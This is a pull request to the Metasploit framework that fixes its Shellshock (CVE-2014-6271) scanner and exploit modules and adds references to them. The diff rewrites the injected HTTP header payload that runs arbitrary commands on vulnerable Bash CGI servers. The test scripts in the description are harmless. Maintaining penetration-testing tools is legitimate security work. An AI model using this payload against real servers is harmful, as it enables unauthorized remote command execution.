### PR TITLE
Fix bad header error from pure Bash CGI script

### DIFF
--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -101,9 +101,13 @@ class Metasploit4 < Msf::Auxiliary
       'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
       'headers' => {
-        datastore['HEADER'] => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+        datastore['HEADER'] => sploit(cmd)
       }
     )
+  end
+
+  def sploit(cmd)
+    %Q{() { :;};echo -e "\\r\\n#{@marker}$(#{cmd})#{@marker}"}
   end
 
   def marker

--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -45,14 +45,12 @@ class Metasploit4 < Msf::Auxiliary
       OptString.new('CMD', [true, 'Command to run (absolute paths required)',
         '/usr/bin/id'])
     ], self.class)
-
-    @marker = marker
   end
 
   def check_host(ip)
-    res = req("echo #{@marker}")
+    res = req("echo #{marker}")
 
-    if res && res.body.include?(@marker * 3)
+    if res && res.body.include?(marker * 3)
       report_vuln(
         :host => ip,
         :port => rport,
@@ -85,7 +83,7 @@ class Metasploit4 < Msf::Auxiliary
 
     res = req(datastore['CMD'])
 
-    if res && res.body =~ /#{@marker}(.+)#{@marker}/m
+    if res && res.body =~ /#{marker}(.+)#{marker}/m
       print_good("#{peer} - #{$1}")
       report_vuln(
         :host => ip,
@@ -107,11 +105,11 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def sploit(cmd)
-    %Q{() { :;};echo -e "\\r\\n#{@marker}$(#{cmd})#{@marker}"}
+    %Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
   end
 
   def marker
-    Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    @marker ||= Rex::Text.rand_text_alphanumeric(rand(42) + 1)
   end
 
 end

--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -29,6 +29,8 @@ class Metasploit4 < Msf::Auxiliary
       ],
       'References' => [
         ['CVE', '2014-6271'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
         ['URL', 'https://access.redhat.com/articles/1200223'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
       ],

--- a/modules/auxiliary/server/dhclient_bash_env.rb
+++ b/modules/auxiliary/server/dhclient_bash_env.rb
@@ -37,6 +37,8 @@ class Metasploit3 < Msf::Auxiliary
       'References' => [
         ['CVE', '2014-6271'],
         ['CWE', '94'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
         ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
         ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]

--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -121,9 +121,13 @@ class Metasploit4 < Msf::Exploit::Remote
         'method' => datastore['METHOD'],
         'uri' => normalize_uri(target_uri.path.to_s),
         'headers' => {
-          datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+          datastore['HEADER'] => sploit(cmd)
         }
       }, datastore['TIMEOUT'])
+  end
+
+  def sploit(cmd)
+    %Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
   end
 
   def marker

--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -26,6 +26,8 @@ class Metasploit4 < Msf::Exploit::Remote
       ],
       'References' => [
         ['CVE', '2014-6271'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
         ['URL', 'https://access.redhat.com/articles/1200223'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
       ],

--- a/modules/exploits/osx/local/vmware_bash_function_root.rb
+++ b/modules/exploits/osx/local/vmware_bash_function_root.rb
@@ -30,7 +30,9 @@ class Metasploit3 < Msf::Exploit::Local
         ],
       'References'    =>
         [
-          [ 'CVE', '2014-6271' ]
+          [ 'CVE', '2014-6271' ],
+          [ 'OSVDB', '112004' ],
+          [ 'EDB', '34765' ]
         ],
       'Platform'      => 'osx',
       'Arch'          => [ ARCH_X86_64 ],

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -37,7 +37,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'References'     =>
         [
-          ['CVE', '2014-6271']
+          ['CVE', '2014-6271'],
+          ['OSVDB', '112004'],
+          ['EDB', '34765']
         ],
       'Payload'        =>
         {


### PR DESCRIPTION
Also added OSVDB and EDB references and polished up the code a bit.

**Verification steps:**

For a _pure Bash CGI script_, please verify the following:
- [ ] Verify that `run` now works for the auxiliary module
- [ ] Verify that `check` now works for the exploit module
- [ ] Verify that the references are correct

I've been using the following script:

```
#!/bin/bash
echo hello, world
```

My Perl script for reference:

```
#!/usr/bin/perl
print `echo hello, world`;
```
